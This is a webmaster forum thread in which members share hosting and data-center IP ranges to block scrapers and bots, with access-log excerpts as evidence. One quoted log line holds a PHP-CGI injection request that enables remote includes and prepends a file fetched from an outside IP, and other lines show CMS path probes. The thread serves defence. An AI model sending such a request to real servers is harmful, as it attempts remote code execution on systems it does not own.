Welcome to WebmasterWorld Guest from 35.153.135.60

Forum Moderators: Ocean10000

Message Too Old, No Replies

Server Farms - July 2015

Tracking and Reporting Data Center IP Ranges

     
4:09 am on Jul 8, 2015 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


Continuation of the Server Farm threads.

This is where we report data center IP ranges as they are discovered or change in the rapidly evolving assigned IP landscape.

Past server farm threads:

12:30 am on July 10, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:15705
votes: 812


OK, here's one:
103.42.180.136 - - [08/Jul/2015:17:40:29 -0700] "GET /data/admin/allowurl.txt HTTP/1.1" 404 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider" 
103.42.180.136 - - [08/Jul/2015:17:40:38 -0700] "GET /uploads/allimg/index.html HTTP/1.1" 403 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider"
103.42.180.136 - - [08/Jul/2015:17:40:48 -0700] "GET /plus/list.php HTTP/1.1" 403 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider"
103.42.180.136 - - [08/Jul/2015:17:40:48 -0700] "GET /include/captcha/README.txt HTTP/1.1" 404 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider"

For those who haven't been paying attention, 103 is APNIC's answer to 185. Free lookup says that
103.42.180.0/22
(a) belongs to China and (b) "1 website uses this address."

To block or not to block ... Gee, it's so tough to decide.

It took me a while to figure out that the reason requests #1 and #4 made it as far as a 404 was the .txt extension.
4:08 am on July 10, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


(a) belongs to China and (b) "1 website uses this address."
To block or not to block ... Gee, it's so tough to decide.

Looks like Shenzhen Yi Cloud Network (myhostadmin.cn) is a mixed services company - internet access, mobile network and hosting. That whopping "1 website" may be the only one there. But you know the Chinese... one today, a billion tomorrow!

Those GET requests appear to be the standard type probes usually seen by compromised accounts IMO. But then I'm biased; since I took down my Asia/Pacific blocks, my human traffic almost doubled and the increased revenue from Adsence has more than justified dealing with the occasional script threat from that region. I have other mechanisms in place for that.
9:31 am on July 10, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893



sakura.ne.jp
112.78.112.0/20
112.78.112.0 - 112.78.127.255
2:12 pm on July 10, 2015 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:Oct 13, 2003
posts:705
votes: 0


Knowing our Lucy, I think we can safely assume her question was indeed rhetorical :)
9:01 am on July 11, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893



meerfarbig.de
185.44.104.0/22
185.44.104.0 - 185.44.107.255
9:05 am on July 12, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893



owned-networks.net
104.244.152.0/21
104.244.152.0 - 104.244.159.255
9:10 am on July 16, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893



stormweb.ca
207.112.70.0/24
207.112.70.0 - 207.112.70.255

xmission.com
207.135.128.0/19
207.135.128.0 - 207.135.159.255
9:59 pm on July 16, 2015 (gmt 0)

Senior Member

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 11, 2001
posts:5505
votes: 5


XMission uses some sub-nets from WestNet, which I've omitted.
XMISSION-166-70-0-0 166.70.0.0 - 166.70.255.255 166.70.
XMISSION-207-135-128-0 207.135.128.0 - 207.135.159.255 207.135.128.0/19
XMISSION 68.69.160.0 - 68.69.175.255 68.69.160.0/20
XMISSION 2607:FA18:: - 2607:FA18:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
12:03 am on July 17, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


Thanks Don, had all those :)

Posted since that respective range had changed since the last time did a look-up.
8:34 am on July 17, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


Turhost.com
37.230.104.0/21
37.230.104.0 - 37.230.111.255
109.232.220.0/22
109.232.220.0 - 109.232.223.255

********

worldwidewebhosting.com
108.174.144.0/20
108.174.144.0 - 108.174.159.255

I assume by the name there are more DCs.
10:55 am on July 17, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


worldwidewebhosting.com admin ranges:
173.192.89.192/27
173.192.89.192 - 173.192.89.223

Reside at softlayer.com:
173.192.0.0/15
173.192.0.0 - 173.193.255.255

(Which *could* indicate they're a reseller.)
12:28 pm on July 17, 2015 (gmt 0)

Senior Member

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 11, 2001
posts:5505
votes: 5


World Wide Web Hosting
WWWHL-NET-01 108.174.144.0 - 108.174.159.255 108.174.144.0/20
WWWHL-NET-02 162.210.48.0 - 162.210.51.255 162.210.48.0/22

In addition has six subnets within Astute Hosting ranges
ASTUTEHOSTING5 104.255.8.0 - 104.255.11.255 104.255.8.0/22
ASTUTEHOSTING4 104.37.72.0 - 104.37.75.255 104.37.72.0/22
ASTUTEHOSTING6 142.147.82.0 - 142.147.83.255 142.147.82.0/23
ASTUTEHOSTING2 162.213.156.0 - 162.213.159.255 162.213.156.0/22
ASTUTEHOSTING3 162.245.144.0 - 162.245.147.255 162.245.144.0/22
ASTUTEHOSTING 199.167.16.0 - 199.167.23.255 199.167.16.0/21
ASTUTEHOSTING 2607:D500:: - 2607:D500:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
9:46 pm on July 17, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


Everytime I read your IPv6 cut'n paste posts, my brain wants to write:
deny from F
10:54 am on July 23, 2015 (gmt 0)

Senior Member

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 11, 2001
posts:5505
votes: 5


This is a useless thread from the respective of search options!
I. e. Add2net [google.com]

Looking for PHP vulnerabilities via a range I did not have (my last saved accumulation was 2008).
AKA Lunar Pages.
Current ranges [whois.arin.net]
11:06 am on July 23, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


I just love it when I have all the ranges :)
5:53 am on July 25, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893



sadecehosting.com
188.132.216.0/21
188.132.216.0 - 188.132.223.255
1:38 pm on July 25, 2015 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3254
votes: 18


Not sure how good this is but may be useful. It claims to test IPs for the type of hosting, if any.

dedicatedornot.com
1:27 am on July 26, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


RE: dedicatedornot.com

Might come in handy for those sometimes questionable IPs where little indication is given through the normal sources.Thanks.
11:16 am on July 26, 2015 (gmt 0)

Senior Member

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 11, 2001
posts:5505
votes: 5


Las Vegas NV Datacenter? or Premianet?
Root request only.
No supporting images.

RES-SERVERPOINT-01 173.254.190.8 - 173.254.190.15 173.254.190.8/29 (RagingWire Data 173.254.176.0 - 173.254.191.255 173.254.176.0/20)
PREMIANET 216.108.224.0 - 216.108.239.255 216.108.224.0/20
APH-LAS-NV1 64.235.32.0 - 64.235.63.255 64.235.32.0/19
PREMIANET 72.18.192.0 - 72.18.207.255 72.18.192.0/20
11:40 am on July 26, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


Thanks, had the 216.108.224.0/20 but not the others.
2:39 pm on July 26, 2015 (gmt 0)

Senior Member

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 11, 2001
posts:5505
votes: 5


It's my recollection that there was a rather recent discussion on IBM Cloud, however no luck locating.

Anybody have any RIPE ranges on Softlayer?
This AM visitor is from Softlayer, however is used by IBM Cloud, and for a specific RIPE customer.
169.53.149.14 - - [26/Jul/2015:05:59:52 -0600] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp ://159 .122.141.239/i.txt HTTP/1.1" 403 635 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7"
3:01 pm on July 26, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


Don't know which ones are RIPE (without squeezing them):

5.10.64.0/18 #SoftLayer 5.10.64.0 - 5.10.127.255
5.153.0.0/18 #SoftLayer 5.153.0.0 - 5.153.63.255
37.58.64.0/18 #SoftLayer 37.58.64.0 - 37.58.127.255
50.22.0.0/15 #SoftLayer 50.22.0.0 - 50.23.255.255
50.97.0.0/16 #SoftLayer 50.97.0.0 - 50.97.255.255
66.228.112.0/20 #SoftLayer 66.228.112.0 - 66.228.127.255
67.228.0.0/16 #SoftLayer 67.228.0.0 - 67.228.255.255
74.86.0.0/16 #Softlayer 74.86.0.0 - 74.86.255.255
75.126.0.0/16 #SoftLayer 75.126.0.0 - 75.126.255.255
104.237.128.0/19 #Linode/Softlayer 104.237.128.0 - 104.237.159.255
108.168.128.0/17 #SoftLayer 108.168.128.0 - 108.168.255.255
119.81.0.0/16 #SoftLayer 119.81.0.0 - 119.81.255.255
158.85.0.0/16 #SoftLayer 158.85.0.0 - 158.85.255.255
159.8.0.0/16 #SoftLayer 159.8.0.0 - 159.8.255.255
159.122.0.0/16 #SoftLayer 159.122.0.0 - 159.122.255.255
159.253.128.0/19 #Softlayer 159.253.128.0 - 159.253.159.255
169.38.0.0/16 #SoftLayer 169.38.0.0 - 169.38.255.255
169.45.0.0/16 #SoftLayer 169.45.0.0 - 169.48.255.255
169.50.0.0/15 #SoftLayer 169.50.0.0 - 169.51.255.255
169.53.0.0/16 #SoftLayer 169.53.0.0 - 169.63.255.255
169.56.0.0/13 #SoftLayer 169.53.0.0 - 169.63.255.255
173.192.0.0/15 #Softlayer 173.192.0.0 - 173.193.255.255
174.36.0.0/15 #Softlayer 174.36.0.0 - 174.37.255.255
174.140.18.0/24 #Softlayer 174.140.18.0 - 174.140.18.255
174.140.29.0/24 #Softlayer 174.140.29.0 - 174.140.29.255
174.140.33.0/24 #Softlayer 174.140.33.0 - 174.140.33.255
174.140.36.0/24 #Softlayer 174.140.36.0 - 174.140.36.255
174.140.51.0/24 #Softlayer 174.140.51.0 - 174.140.51.255
192.155.192.0/18 #SoftLayer 192.155.192.0 - 192.155.255.255
192.255.0.0/18 #SoftLayer 192.255.0.0 - 192.255.63.255
198.23.64.0/18 #SoftLayer 198.23.64.0 - 198.23.127.255
208.43.0.0/16 #SoftLayer 208.43.0.0 - 208.43.255.255
208.101.0.0/18 #SoftLayer 208.101.0.0 - 208.101.63.255
5:24 pm on July 26, 2015 (gmt 0)

Senior Member

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 11, 2001
posts:5505
votes: 5


Many thanks
7:49 pm on July 26, 2015 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3254
votes: 18


Softlayer RIPE (NL) (that I have)...

5.10.64.0 - 5.10.127.255
5.153.0.0 - 5.153.63.255
37.58.64.0 - 37.58.127.255
159.8.0.0 - 159.8.255.255
159.253.128.0 - 159.253.159.255

The above ranges 174.140... combine to...

174.140.0.0 - 174.140.63.255
174.140.0.0/18
Cyber Fusion Systems
12:54 am on July 27, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


@dstiles thanks for the info. They formerly were assigned to SoftLayer. I have them cut-up like that mostly because of the mobile app traffic coming through clouds, which I merely cut'n pasted quickly for Don.

Probably time for another mass validation check of all the ranges I manipulate. Did one last year and found approx 20 had changed ownership, but remained same category and a few that were no longer used for anything related to the former company.
4:29 pm on July 28, 2015 (gmt 0)

Administrator from US 

WebmasterWorld Administrator not2easy is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2006
posts:4352
votes: 299


Update/Correction for BTN server
In case I (or others) missed an update, a CIDR given here last Sept (!) just showed up, but my whois utility shows a different CIDR which seems to be the correct one. This is for "Beyond The Network" range:
BTN-CIDR4 209.8.0.0 - 209.9.255.255 209.8.0.0/16
which was posted last Sept. here, my lookup shows:
BTN-CIDR4 209.8.0.0 - 209.9.255.255 209.8.0.0/15
which looks right since the range does not end with 209.8.255.255 but covers all of 209.9. too.
8:35 pm on July 28, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


I had it as /15 as well. Thanks for the head-up. Always good to give things a second look :)
11:40 am on Aug 10, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


Got hit from a new Sakura range. Scraped HTML & image files:

160.16.119.123 - - [10/Aug/2015:03:07:43 -0700] "GET /example.html HTTP/1.1" 200 15708 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"

Which brings my Sakura list to:

49.212.0.0/16
49.212.0.0 - 49.212.255.255

59.106.0.0/16
59.106.0.0 - 59.106.255.255

112.78.112.0/20
112.78.112.0 - 112.78.127.255

160.16.0.0/16 (new)
160.16.0.0 - 160.16.255.255

182.48.0.0/18
182.48.0.0 - 182.48.63.255

219.94.128.0/17
219.94.128.0 - 219.94.255.255
1:35 pm on Aug 10, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:12913
votes: 893


Even after I blocked the bot ^above^ it continues eating thousands of 403s, going on 3 hours now.
This 106 message thread spans 4 pages: 106